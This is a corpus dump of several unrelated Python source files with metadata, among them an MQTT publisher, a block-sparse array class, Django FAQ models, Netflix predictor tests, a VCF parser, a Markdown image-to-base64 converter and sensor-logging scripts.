object\nclient1.on_publish = on_publish #assign function to callback\n#client1.username_pw_set(ACCESS_TOKEN) #access token from thingsboard device\n#client1.connect(broker,port,keepalive=60) #establishing connection\nclient1.connect(broker)\n\nid = []\nid = args.list\ntopic1 = []\n\nfor i in range(0, len(id)):\n topic1.append(\"drimpac/epe/\" + id[i])\n\nuser_info = [{\"User_Id\": t, \"Topic\": s} for t, s in zip(id, topic1)]\n\nMQTT_MSG = json.dumps(user_info, indent = 4)\nret = client1.publish(topic, MQTT_MSG) #topic name is test\nprint(MQTT_MSG)\nprint(\"Please check data on your Subscriber Code \\n\")\n","sub_path":"drimpac-rest-api/server/pythonScripts/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"568034816","text":"from numbers import Integral\n\nimport numpy as np\n\nfrom . import bumpy\n\nfrom .slicing import normalize_index\nfrom .butils import _zero_of_dtype\nfrom .bsparse_array import BSparseArray\nfrom .compatibility import int, range, zip\n\n\nclass BDOK(BSparseArray):\n \"\"\"\n A class for building sparse multidimensional arrays.\n\n Parameters\n ----------\n shape : tuple[int] (BDOK.ndim,)\n The shape of the array.\n data : dict, optional\n The key-value pairs for the data in this array.\n dtype : np.dtype, optional\n The data type of this array. If left empty, it is inferred from\n the first element.\n\n Attributes\n ----------\n dtype : numpy.dtype\n The datatype of this array. Can be :code:`None` if no elements\n have been set yet.\n shape : tuple[int]\n The shape of this array.\n data : dict\n The keys of this dictionary contain all the indices and the values\n contain the nonzero entries.\n\n See Also\n --------\n BCOO : A read-only sparse array.\n\n Examples\n --------\n You can create :obj:`BDOK` objects from Numpy arrays.\n\n >>> x = np.eye(5, dtype=np.uint8)\n >>> x[2, 3] = 5\n >>> s = BDOK.from_numpy(x)\n >>> s\n \n\n You can also create them from just shapes, and use slicing assignment.\n\n >>> s2 = BDOK((5, 5), dtype=np.int64)\n >>> s2[1:3, 1:3] = [[4, 5], [6, 7]]\n >>> s2\n \n\n You can convert :obj:`BDOK` arrays to :obj:`BCOO` arrays, or :obj:`numpy.ndarray`\n objects.\n\n >>> from sparse import BCOO\n >>> s3 = BCOO(s2)\n >>> s3\n \n >>> s2.todense() # doctest: +NORMALIZE_WHITESPACE\n array([[0, 0, 0, 0, 0],\n [0, 4, 5, 0, 0],\n [0, 6, 7, 0, 0],\n [0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0]])\n\n >>> s4 = BCOO.from_numpy(np.eye(4, dtype=np.uint8))\n >>> s4\n \n >>> s5 = BDOK.from_bcoo(s4)\n >>> s5\n \n\n You can also create :obj:`BDOK` arrays from a shape and a dict of\n values. Zeros are automatically ignored.\n\n >>> values = {\n ... (1, 2, 3): 4,\n ... (3, 2, 1): 0,\n ... 
}\n >>> s6 = BDOK((5, 5, 5), values)\n >>> s6\n \n \"\"\"\n\n def __init__(self, shape, block_shape=None, data=None, dtype=None):\n from .bcoo import BCOO\n self.data = dict()\n\n if isinstance(shape, BCOO):\n if block_shape is not None:\n raise RuntimeError('Cannot supply block_shape when converting from BCOO')\n ar = BDOK.from_bcoo(shape)\n self._make_shallow_copy_of(ar)\n return\n\n if block_shape is None:\n raise RuntimeError('block_shape cannot be None unless initializing from BCOO')\n\n if isinstance(shape, np.ndarray): \n ar = BDOK.from_numpy(shape, block_shape)\n self._make_shallow_copy_of(ar)\n return\n\n self.dtype = np.dtype(dtype)\n super(BDOK, self).__init__(shape, block_shape)\n\n if not data:\n data = dict()\n\n if isinstance(data, dict):\n if not dtype:\n if not len(data):\n self.dtype = np.dtype('float64')\n else:\n self.dtype = np.result_type(*map(lambda x: np.asarray(x).dtype, data.values()))\n\n for c, d in data.items():\n self[c] = d\n else:\n raise ValueError('data must be a dict.')\n\n def _make_shallow_copy_of(self, other):\n super(BDOK, self).__init__(other.shape, other.block_shape)\n self.dtype = other.dtype\n self.data = other.data\n\n @classmethod\n def from_bcoo(cls, x):\n \"\"\"\n Get a :obj:`BDOK` array from a :obj:`BCOO` array.\n\n Parameters\n ----------\n x : BCOO\n The array to convert.\n\n Returns\n -------\n BDOK\n The equivalent :obj:`BDOK` array.\n\n Examples\n --------\n >>> from sparse import BCOO\n >>> s = BCOO.from_numpy(np.eye(4))\n >>> s2 = BDOK.from_bcoo(s)\n >>> s2\n \n \"\"\"\n ar = cls(x.shape, x.block_shape, dtype=x.dtype)\n\n for c, d in zip(x.coords.T, x.data):\n ar.data[tuple(c)] = d\n\n return ar\n\n def to_bcoo(self):\n \"\"\"\n Convert this :obj:`BDOK` array to a :obj:`BCOO` array.\n\n Returns\n -------\n BCOO\n The equivalent :obj:`BCOO` array.\n\n Examples\n --------\n >>> s = BDOK((5, 5))\n >>> s[1:3, 1:3] = [[4, 5], [6, 7]]\n >>> s\n \n >>> s2 = s.to_bcoo()\n >>> s2\n \n \"\"\"\n from .bcoo import BCOO\n return BCOO(self)\n\n @classmethod\n def from_numpy(cls, x, block_shape):\n \"\"\"\n Get a :obj:`BDOK` array from a Numpy array.\n\n Parameters\n ----------\n x : np.ndarray\n The array to convert.\n\n Returns\n -------\n BDOK\n The equivalent :obj:`BDOK` array.\n\n Examples\n --------\n >>> s = BDOK.from_numpy(np.eye(4))\n >>> s\n \n \"\"\"\n ar = cls(x.shape, block_shape, dtype=x.dtype)\n\n # first convert to bndarray\n ba = bumpy.bndarray(ar.outer_shape, block_shape, data = x) \n sum_x = np.zeros(ar.outer_shape)\n for ix in np.ndindex(sum_x.shape):\n sum_x[ix] = np.sum(np.abs(ba[ix]))\n \n coords = np.nonzero(sum_x)\n data = ba[coords]\n\n for c in zip(data, *coords):\n d, c = c[0], c[1:]\n ar.data[c] = d\n\n return ar\n\n @classmethod\n def from_bumpy(cls, x, block_shape):\n \"\"\"\n Get a :obj:`BDOK` array from a bumpy array.\n\n Parameters\n ----------\n x : bumpy.bndarray\n The array to convert.\n\n Returns\n -------\n BDOK\n The equivalent :obj:`BDOK` array.\n\n Examples\n --------\n \"\"\"\n ar = cls(x.shape, block_shape, dtype=x.dtype)\n\n # first convert to bndarray\n ba = x \n sum_x = np.zeros(ar.outer_shape)\n for ix in np.ndindex(sum_x.shape):\n sum_x[ix] = np.sum(np.abs(ba[ix]))\n \n coords = np.nonzero(sum_x)\n data = ba[coords]\n\n for c in zip(data, *coords):\n d, c = c[0], c[1:]\n ar.data[c] = d\n\n return ar\n\n\n @property\n def nnz(self):\n \"\"\"\n The number of nonzero elements in this array.\n\n Returns\n -------\n int\n The number of nonzero elements.\n\n See Also\n --------\n BCOO.nnz : Equivalent 
:obj:`BCOO` array property.\n numpy.count_nonzero : A similar Numpy function.\n scipy.sparse.bdok_matrix.nnz : The Scipy equivalent property.\n\n Examples\n --------\n >>> values = {\n ... (1, 2, 3): 4,\n ... (3, 2, 1): 0,\n ... }\n >>> s = BDOK((5, 5, 5), values)\n >>> s.nnz\n 1\n \"\"\"\n return len(self.data) * np.product(self.block_shape)\n\n def __getitem__(self, key):\n key = normalize_index(key, self.outer_shape)\n\n if not all(isinstance(i, Integral) for i in key):\n raise NotImplementedError('All indices must be integers'\n ' when getting an item.')\n\n if len(key) != self.ndim:\n raise NotImplementedError('Can only get single elements. '\n 'Expected key of length %d, got %s'\n % (self.ndim, str(key)))\n\n key = tuple(int(k) for k in key)\n\n if key in self.data:\n return self.data[key]\n else:\n #return _zero_of_dtype(self.dtype)[()]\n return np.zeros(self.block_shape, dtype = self.dtype)\n\n def __setitem__(self, key, value):\n key = normalize_index(key, self.outer_shape)\n value = np.asanyarray(value)\n\n value = value.astype(self.dtype)\n\n key_list = [int(k) if isinstance(k, Integral) else k for k in key]\n\n self._setitem(key_list, value)\n\n def _setitem(self, key_list, value):\n #value_missing_dims = len([ind for ind in key_list if isinstance(ind, slice)]) - value.ndim \n \n # ZHC NOTE: here I think should be some additional treatment of slicing.\n # currently only precise indexing is tested.\n\n #if value_missing_dims < 0:\n # raise ValueError('setting an array element with a sequence.')\n\n\n\n for i, ind in enumerate(key_list):\n if isinstance(ind, slice):\n step = ind.step if ind.step is not None else 1\n if step > 0:\n start = ind.start if ind.start is not None else 0\n start = max(start, 0)\n stop = ind.stop if ind.stop is not None else self.outer_shape[i]\n stop = min(stop, self.outer_shape[i])\n if start > stop:\n start = stop\n else:\n start = ind.start or self.outer_shape[i] - 1\n stop = ind.stop if ind.stop is not None else -1\n start = min(start, self.outer_shape[i] - 1)\n stop = max(stop, -1)\n if start < stop:\n start = stop\n\n key_list_temp = key_list[:]\n for v_idx, ki in enumerate(range(start, stop, step)):\n key_list_temp[i] = ki\n vi = value if value_missing_dims > 0 else \\\n (value[0] if value.shape[0] == 1 else value[v_idx])\n self._setitem(key_list_temp, vi)\n\n return\n elif not isinstance(ind, Integral):\n raise IndexError('All indices must be slices or integers'\n ' when setting an item.')\n\n key = tuple(key_list)\n #if value != _zero_of_dtype(self.dtype):\n if np.sum(np.abs(value)) != 0.0:\n self.data[key] = value[()]\n elif key in self.data:\n del self.data[key]\n\n def __str__(self):\n return \"\" % (self.shape, self.outer_shape, self.block_shape, self.dtype, self.nnz)\n\n __repr__ = __str__\n\n def todense(self):\n \"\"\"\n Convert this :obj:`BDOK` array into a Numpy array.\n\n Returns\n -------\n numpy.ndarray\n The equivalent dense array.\n\n See Also\n --------\n BCOO.todense : Equivalent :obj:`BCOO` array method.\n scipy.sparse.bdok_matrix.todense : Equivalent Scipy method.\n\n Examples\n --------\n >>> s = BDOK((5, 5))\n >>> s[1:3, 1:3] = [[4, 5], [6, 7]]\n >>> s.todense() # doctest: +SKIP\n array([[0., 0., 0., 0., 0.],\n [0., 4., 5., 0., 0.],\n [0., 6., 7., 0., 0.],\n [0., 0., 0., 0., 0.],\n [0., 0., 0., 0., 0.]])\n \"\"\"\n result = bumpy.zeros(self.outer_shape, self.block_shape, dtype = self.dtype)\n\n for c, d in self.data.items():\n result[c] = d\n \n return result.todense()\n\n def to_bumpy(self):\n \"\"\"\n Convert this 
:obj:`BDOK` array into a bumpy array.\n\n Returns\n -------\n bumpy.bndarray\n The equivalent dense array.\n\n See Also\n --------\n BCOO.todense : Equivalent :obj:`BCOO` array method.\n scipy.sparse.bdok_matrix.todense : Equivalent Scipy method.\n\n Examples\n --------\n \"\"\"\n result = bumpy.zeros(self.outer_shape, self.block_shape, dtype = self.dtype)\n\n for c, d in self.data.items():\n result[c] = d\n \n return result\n\n\n\n def asformat(self, format):\n \"\"\"\n Convert this sparse array to a given format.\n\n Parameters\n ----------\n format : str\n A format string.\n\n Returns\n -------\n out : SparseArray\n The converted array.\n\n Raises\n ------\n NotImplementedError\n If the format isn't supported.\n \"\"\"\n if format == 'bdok' or format is BDOK:\n return self\n\n from .bcoo import BCOO\n if format == 'bcoo' or format is BCOO:\n return BCOO.from_iter(self.data, shape=self.shape,\n block_shape=self.block_shape)\n\n raise NotImplementedError('The given format is not supported.')\n","sub_path":"sparse/bdok.py","file_name":"bdok.py","file_ext":"py","file_size_in_byte":12902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"376104682","text":"import datetime\nfrom django.conf import settings\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom managers import PreOrderedManager\n\nclass Topic(models.Model):\n \"\"\"\n Generic Topics for FAQ question grouping\n \"\"\"\n name = models.CharField(_('name'), max_length=150)\n sort_order = models.IntegerField(_('sort order'), default=0,\n help_text=_('The order you would like the topic to be displayed.'))\n\n objects = PreOrderedManager()\n\n def get_absolute_url(self):\n return '/faq/' + self.slug\n\n class Meta:\n verbose_name = _(\"Topic\")\n verbose_name_plural = _(\"Topics\")\n ordering = ['sort_order', 'name']\n\n def __unicode__(self):\n return self.name\n\nclass Question(models.Model):\n text = models.TextField(_('question'), help_text=_('The actual question itself.'))\n answer = models.TextField(_('answer'), blank=True, help_text=_('The answer text.'))\n topic = models.ForeignKey(Topic, verbose_name=_('topic'), related_name='questions')\n \n protected = models.BooleanField(_('is protected'), default=False,\n help_text=_(\"Set true if this question is only visible by authenticated users.\"))\n \n sort_order = models.IntegerField(_('sort order'), default=0,\n help_text=_('The order you would like the question to be displayed.'))\n\n objects = PreOrderedManager()\n\n class Meta:\n verbose_name = _(\"Frequent asked question\")\n verbose_name_plural = _(\"Frequently asked questions\")\n ordering = ['sort_order']\n\n def __unicode__(self):\n return self.text\n","sub_path":"faq/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"620219752","text":"__author__ = 'wnation'\n\n#!/usr/bin/env python3\n\n# -------------------------------\n\n# -------------------------------\n\n\"\"\"\nTo test the program:\n\t% python TestNetflix.py >& TestNetflix.out\n\t% chmod ugo+x TestNetflix.py\n\t% TestNetflix.py >& TestNetflix.out\n\"\"\"\n\n# -------\n# imports\n# -------\n\nimport io\nimport unittest\n\nfrom Netflix import weighted_dict, rmse, netflix_read, netflix_print, netflix_solve\n\n# -----------\n# TestCollatz\n# -----------\n\nclass TestNetflix (unittest.TestCase) :\n\n\t# ----\n\t# rmse\n\t# ----\n\n\tdef test_rmse_1 
(self) :\n\t\tv = rmse((1,2,3), (1,2,3))\n\t\tself.assertTrue(str(v) == \"0.0\")\n\n\tdef test_rmse_2 (self) :\n\t\tv = rmse((1,2,3), (2,3,4))\n\t\tself.assertTrue(str(v) == \"1.0\")\n\n\tdef test_rmse_3 (self) :\n\t\tv = rmse((2,3,4), (4,3,2))\n\t\tself.assertTrue(str(v) == \"1.632993161855452\")\n\n\tdef test_rmse_4 (self) :\n\t\tself.assertRaises(AssertionError,rmse,(1,1,1), (1,1))\n\n\n\t# ----\n\t# netflix_read\n\t# ----\n\n\tdef test_read_1 (self) :\n\t\tr = io.StringIO(\"1:\\n1\\n2\\n3\\n2:\\n1\\n2\\n3\\n\")\n\t\tm = {}\n\t\tm = netflix_read(r)\n\t\tself.assertTrue(m[1] == [1,2,3])\n\t\tself.assertTrue(m[2] == [1,2,3])\n\n\tdef test_read_2 (self) :\n\t\tr = io.StringIO(\"1:\\n1\\n10\\n1000\\n2:\\n10\\n\")\n\t\tm = {}\n\t\tm = netflix_read(r)\n\t\tself.assertTrue(m[1] == [1,10,1000])\n\t\tself.assertTrue(m[2] == [10])\n\n\tdef test_read_3 (self) :\n\t\tr = io.StringIO(\"1:\\n1\\n10\\n1000\\n2:\\n0\")\n\t\tm = {}\n\t\tm = netflix_read(r)\n\t\tself.assertTrue(m[1] == [1,10,1000])\n\t\tself.assertTrue(m[2] == [0])\n\t\t\n\tdef test_read_4 (self) :\n\t\tr = io.StringIO(\"1:\\n1\\n2:\\n\")\n\t\tm = {}\n\t\tm = netflix_read(r)\n\t\tself.assertTrue(m[1] == [1])\n\t\tself.assertTrue(m[2] == [])\n\n\t\n\n\t# -----\n\t# netflix_solve\n\t# -----\n\tdef test_netflix_solve_1 (self):\n\t\tr = io.StringIO(\"1005:\\n188792\\n239493\\n532649\")\n\t\tw = io.StringIO()\n\t\tnetflix_solve(r, w)\n\t\tself.assertTrue(w.getvalue() == \n\t\t\t\"1005:\\n3.108410\\n2.977337\\n2.723416\\nRMSE: 0.6630175045447323\\n\")\n\n\tdef test_netflix_solve_2 (self):\n\t\tr = io.StringIO(\"10042:\\n86062\")\n\t\tw = io.StringIO()\n\t\tnetflix_solve(r, w)\n\t\tself.assertTrue(w.getvalue() == \"10042:\\n4.672252\\nRMSE: 0.3277478223987025\\n\")\n\t\n\tdef test_netflix_solve_3 (self):\n\t\tr = io.StringIO(\"\")\n\t\tw = io.StringIO()\n\t\tself.assertRaises(AssertionError,netflix_solve,r, w)\n\t\t\n\t# -----\n\t# weighted_dict\n\t# -----\n\tdef test_weighted_dict_1 (self):\n\t\tdictionary = {1:[2,3,4], 2:[2,3,4]}\n\t\tm_avg = {1:3.0, 2: 4.0}\n\t\tc_avg = {2: 3.0, 3: 4.0, 4: 5.0}\n\t\tweight = {}\n\t\tweight = weighted_dict(dictionary, c_avg, m_avg)\n\t\tself.assertTrue(weight[1] == [2.3, 3.3, 4.3])\n\t\tself.assertTrue(weight[2] == [3.3, 4.3, 5.0])\n\t\t\n\tdef test_weighted_dict_2 (self):\n\t\tdictionary = {1:[2,3,4], 2:[2,3,5], 3:[6]}\n\t\tm_avg = {1:1.1, 2: 4.99, 3:3.5}\n\t\tc_avg = {2: 4.9, 3: 2.33, 4: 1.1, 5:3.35, 6:3.5}\n\t\tweight = {}\n\t\tweight = weighted_dict(dictionary, c_avg, m_avg)\n\t\tself.assertTrue(weight[1] == [2.3000000000000003, 1.0, 1.0])\n\t\tself.assertTrue(weight[2] == [5.0, 3.62, 4.640000000000001])\n\t\tself.assertTrue(weight[3] == [3.3])\n\t\n\t# -----\n\t# netflix_print\n\t# -----\n\tdef test_netflix_print_1 (self):\n\t\tdictionary = {1:[2,3,4], 2:[2,3,4]}\n\t\tm_avg = {1:3.0, 2: 4.0}\n\t\tc_avg = {2: 3.0, 3: 4.0, 4: 5.0}\n\t\tweight = {}\n\t\tweight = weighted_dict(dictionary, c_avg, m_avg)\n\t\tw = io.StringIO()\n\t\tnetflix_print(weight, w)\n\t\tself.assertTrue(w.getvalue() == \"1:\\n2.300000\\n3.300000\\n4.300000\\n2:\\n\"\n\t\t\t+ \"3.300000\\n4.300000\\n5.000000\\n\")\n\t\t\t\n\tdef test_netflix_print_2 (self):\n\t\tdictionary = {1:[2,3,4], 2:[2,3,4]}\n\t\tm_avg = {1:1.0, 2: 1.0}\n\t\tc_avg = {2: 5.0, 3: 5.0, 4: 5.0}\n\t\tweight = {}\n\t\tweight = weighted_dict(dictionary, c_avg, m_avg)\n\t\tw = io.StringIO()\n\t\tnetflix_print(weight, w)\n\t\tself.assertTrue(w.getvalue() == \"1:\\n2.300000\\n2.300000\\n2.300000\\n2:\\n2.300000\\n\"\n\t\t\t+ \"2.300000\\n2.300000\\n\")\n\t\t\n\n\n# ----\n# 
main\n# ----\n\nprint(\"TestNetflix.py\")\nunittest.main()\nprint(\"Done.\")\n","sub_path":"wnation-TestNetflix.py","file_name":"wnation-TestNetflix.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"409126367","text":"#!/usr/bin/env python\n#=========================================================================\n# This is OPEN SOURCE SOFTWARE governed by the Gnu General Public\n# License (GPL) version 3, as described at www.opensource.org.\n# Copyright (C)2017 William H. Majoros (martiandna@gmail.com).\n#=========================================================================\nfrom __future__ import (absolute_import, division, print_function, \n unicode_literals, generators, nested_scopes, with_statement)\nfrom builtins import (bytes, dict, int, list, object, range, str, ascii,\n chr, hex, input, next, oct, open, pow, round, super, filter, map, zip)\n# The above imports should allow this program to run in both Python 2 and\n# Python 3. You might need to update your version of module \"future\".\nimport sys\nimport ProgramName\nfrom Rex import Rex\nrex=Rex()\n\nTHOUSAND_FREQS=\"/home/bmajoros/stan/1000G-freqs.txt\"\n\ndef loadThousand():\n thousand={}\n with open(THOUSAND_FREQS,\"rt\") as IN:\n for line in IN:\n fields=line.rstrip().split()\n if(len(fields)!=2): continue\n (id,freq)=fields\n if(rex.find(\",\",freq)):\n subfields=freq.split(\",\")\n values=[]\n for subfield in subfields: values.append(float(subfield))\n freq=max(values)\n else: freq=float(freq)\n count=freq*5008\n thousand[id]=count\n return thousand\n\n#=========================================================================\n# main()\n#=========================================================================\nif(len(sys.argv)!=2):\n exit(ProgramName.get()+\" \\n\")\n(infile,)=sys.argv[1:]\n\n#thousand=loadThousand()\nwith open(infile,\"rt\") as IN:\n for line in IN:\n if(rex.find(\"^\\s*#\",line)): continue\n if(rex.find(\"CHROM\",line)): continue\n fields=line.rstrip().split()\n chrom=fields[0]\n pos=fields[1]\n id=fields[2]\n n=len(fields)\n ref=0; alt=0\n for i in range(9,n):\n if(not rex.find(\"^(\\d)[/|](\\d)\",fields[i])): continue\n left=int(rex[1])\n right=int(rex[2])\n alt+=left+right\n ref+=2-left-right\n total=ref+alt\n #ref=float(ref)/float(total)\n #alt=float(alt)/float(total)\n if(alt==0 or ref==0): continue\n thousandCount=0 #thousand.get(id,0)\n altCount=alt+thousandCount\n altFreq=float(altCount)/float(total+5008)\n carlFreq=float(alt)/float(total)\n if(id==\".\"): id=chrom+\"@\"+pos\n #print(id,altFreq,carlFreq,altFreq>carlFreq,alt,thousandCount,sep=\"\\t\")\n #print(id,carlFreq,sep=\"\\t\")\n print(id,chrom,pos,fields[3],fields[4],sep=\"\\t\")\n\n\n","sub_path":"parse-vcf.py","file_name":"parse-vcf.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"509958444","text":"from collections import Counter\nfrom typing import List\n\n\nclass Solution:\n \"\"\" Accepted \"\"\"\n def totalFruit(self, tree: List[int]) -> int:\n p1 = p2 = max_res = 0\n counter, t = Counter(), 0\n\n while p1 < len(tree) and p2 < len(tree):\n if t <= 2:\n if counter[tree[p2]] == 0:\n t += 1\n counter[tree[p2]] += 1\n p2 += 1\n\n if t <= 2 and max_res < p2 - p1:\n max_res = p2 - p1\n else:\n counter[tree[p1]] -= 1\n if counter[tree[p1]] == 0:\n t -= 1\n p1 += 1\n\n return 
max_res","sub_path":"leetcode/p0904_fruit_basket/my_attempt.py","file_name":"my_attempt.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"422968547","text":"from tkinter import *\r\nimport tkinter.filedialog\r\nimport re\r\nimport base64\r\nimport requests\r\nfrom io import BytesIO\r\nimport imghdr\r\n\r\nroot = Tk()\r\nroot.title('MD online-image to base64 converter')\r\nroot.geometry('380x300')\r\nfiledirs = []\r\n\r\ndef xz():\r\n filenames = tkinter.filedialog.askopenfilenames()\r\n if len(filenames) != 0:\r\n string_filename = \"\"\r\n for i in range(0,len(filenames)):\r\n string_filename += str(filenames[i])+\"\\n\"\r\n filedirs.append(str(filenames[i]))\r\n lb.config(text = \"Selected files:\\n\"+string_filename)\r\n else:\r\n lb.config(text = \"No file selected\")\r\n\r\ndef getimage(url):\r\n imgurl = url\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.864.37\"}\r\n result = requests.request(\"GET\", imgurl, headers=headers)\r\n ls_f=base64.b64encode(BytesIO(result.content).read())\r\n imgtype= imghdr.what(None,result.content)\r\n if imgtype == 'webp': \r\n result = 'data:image/jpg;base64,'+str(ls_f.decode('utf8'))\r\n else:\r\n result = 'data:image/'+imgtype+';base64,'+str(ls_f.decode('utf8'))\r\n return result\r\n\r\ndef main():\r\n for file in filedirs:\r\n file_obj = open(file,'r+',encoding='utf-8')\r\n content = file_obj.read()\r\n pattern = re.compile(r\"!\\[.*\\]\\((.*?)\\)\")\r\n rule = pattern.findall(content)\r\n print('Converting '+str(len(rule))+' images in total')\r\n for url in rule:\r\n try:\r\n result = getimage(url)\r\n content = content.replace(url,result)\r\n with open(file,\"w\",encoding=\"utf-8\") as f:\r\n f.write(content)\r\n except:\r\n url1 = re.sub(r'////', '//', url)\r\n result = getimage(url1)\r\n content = content.replace(url,result)\r\n with open(file,\"w\",encoding=\"utf-8\") as f:\r\n f.write(content)\r\n lb.config(text = \"Conversion complete\",fg=\"red\",font=(\"微软雅黑\", 24, \"bold\", \"italic\"),height=50,width=100)\r\n\r\nlb = Label(root,text = '')\r\nlb.pack()\r\nbtn = Button(root,text=\"Select MD files\",command=xz,font=(\"微软雅黑\", 18))\r\nbtn.pack()\r\nstartbtn = Button(root,text=\"Start conversion\",command=main,font=(\"微软雅黑\", 18))\r\nstartbtn.pack()\r\nroot.mainloop()","sub_path":"md-finished.py","file_name":"md-finished.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"459420005","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Jonathan Halama\n@date: 25 March, 2019\n@purpose: Locates fish 
movements from a HexSim log file.\n\"\"\"\nimport os\nimport time\nstarttime = time.time()\n\ndef findHexSimSTPandDSP (hexSimLogFile, newHexSimLogFile):\n myInputFile = open(hexSimLogFile, 'r')\n myNewFile = open(newHexSimLogFile, 'w')\n\n # Read each line in the log file.\n for line in myInputFile:\n # Split the comma-delimited log line into fields.\n lineInfo = line.split(\",\")\n \n if (lineInfo[0] == \"STP\"):\n # New model timestep.\n myNewFile.write(line)\n\n if (lineInfo[0] == \"DSP\"):\n myNewFile.write(line)\n \n###### User inputs ######\nmyFilepath = \"C:\\\\Users\\\\Jonat\\\\Desktop\\\\CWR_LeafletMaps\\\\TEST.log\"\nfilesize = os.path.getsize(myFilepath)\nnewHexSimLogFile = (\"C:\\\\Users\\\\Jonat\\\\Desktop\\\\CWR_LeafletMaps\\\\smalllerTEST.log\")\n\nfindHexSimSTPandDSP(myFilepath, newHexSimLogFile)\n\ntotaltime = time.time() - starttime\n\nminutes = 0\nseconds = 0\n\nif (totaltime > 60):\n minutes = int(totaltime/60)\n seconds = int(totaltime - (minutes*60))\n seconds = '{:2d}'.format(seconds) # pad the seconds for display\n \n\nprint (\"Done isolating fish and steps. Processing took: \" + str(minutes) + \" minutes and \" + str(seconds) + \" seconds to process the HexSim log file of size: \" + str(filesize) + \" KB. You are welcome.\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"ProcessHexSimLogFileFor_STP_DSP.py","file_name":"ProcessHexSimLogFileFor_STP_DSP.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"465270418","text":"# NAME: serial_write.py\n# AUTHOR: Matthew Miller\n# PURPOSE: Records data from iMet sensor into a file called IMETDATAXX.CSV.\n#\t\t\tIf the program detects that an ADC has been attached, the program\n#\t\t\twill send ADC data, immediately followed by iMet data through the\n#\t\t\tserial port. This is intended to be used with an xBee in coordination\n#\t\t\twith a ground station computer. The ground station computer will be \n#\t\t\tset up to display a live graph of the data.\n\n#NOTE: all xbee communication lines have been commented out for the time being (serial initialization and a single write inside the while loop\n#\t\t\t\t\t\t\t\t\t\tThis was done on 6/7/21 for testing purposes)\n\nimport os\nimport time\nimport serial\nimport sys\nfrom gpiozero import LED, Button\n\n#check if Arduino ADC is connected via USB\n#if not used, program continues with only iMET recording\ntry:\n ser_ADC = serial.Serial(\n port='/dev/ARD',\n baudrate = 9600,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=2\n )\n use_ADC = 1\nexcept: #error if no adc attached.\n print(\"No ADC attached. Not using.\\n\")\n use_ADC = 0\n\n \n#ser_xBee = serial.Serial(\n# port='/dev/ttyS0',\n# baudrate = 9600,\n# parity=serial.PARITY_NONE,\n# stopbits=serial.STOPBITS_ONE,\n# bytesize=serial.EIGHTBITS,\n# timeout=1\n#)\n\n#check if iMet attached\ntry:\n ser_iMET = serial.Serial(\n port='/dev/ttyUSB1',\n baudrate = 57600, \n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n bytesize=serial.EIGHTBITS,\n timeout=1\n\t)\nexcept:\n print(\"no iMET attached, cannot continue. 
\\n\")\n exit()\n\ntry:\n collect_ADC = LED(27)\n stop_button = Button(25, pull_up=False) #TODO: was 25, changed to 13/17\n\n counter=0#potentially unneccessary\n\n#open iMET file\n#first get filename\n config = \"/home/pi/BC6B/CONFIG\"\n location = sys.argv[1]\n init_iMET_filename = \"IMETDATA\"\n for i in range(100):\n j = i-1\n to_append = str(j)+\".CSV\" #TODO was i\n config_to_append = str(i) + \".YML\"\n true_config = config + config_to_append\n iMET_appended = location + init_iMET_filename + to_append\n file_exists = os.path.isfile(true_config)\n if file_exists == 0: #if file doesn't exist exit loop and create it\n\t\t\t #file is created in the following while loop\n print(\"file created\")\n break\n\n print(\"launching while loop \\n\")\n \n temp = 1\n while(True):\n if use_ADC == 1:\n iMET_file = open(iMET_appended, \"a+\") #open new iMET file appending\n data_iMET = ser_iMET.readline().decode()\n collect_ADC.on() #tell arduino to grab data\n collect_ADC.off()\n data_ADC = ser_ADC.readline().decode()\n\t #data_all = data_ADC + data_iMET\n #ser_xBee.write(data_all)\n iMET_file.write(data_iMET)\n iMET_file.write(\"\\n\")\n iMET_file.close()\n\t\t\n else:\n \n iMET_file = open(iMET_appended, \"a+\") #open new iMET file appending\n data_iMET = ser_iMET.readline().decode()\n iMET_file.write(data_iMET)\n print(data_iMET) #TODO\n iMET_file.write(\"\\n\")\n iMET_file.close()\n time.sleep(1)\n \n#stop_button.wait_for_press()\n#print(\"aye bro the button was pressed\")\n \"\"\"\n time.sleep(1)\n for x in range (10):\n iMET_file = open(iMET_appended, \"a+\") #open new iMET file appending\n data_iMET = ser_iMET.readline().decode()\n print(data_iMET)\n iMET_file.write(data_iMET)\n iMET_file.write(\"\\n\")\n iMET_file.close()\n \n\n print(\"done\\n\")\n \"\"\"\nexcept:\n print(\"exception thrown\")\n if not iMET_file.closed:\n iMET_file.close()\n\t\t\n\t\t\n","sub_path":"iMET_sampling.py","file_name":"iMET_sampling.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"7330001","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport sys\nfrom functools import partial\n\nfrom cassandra.cluster import 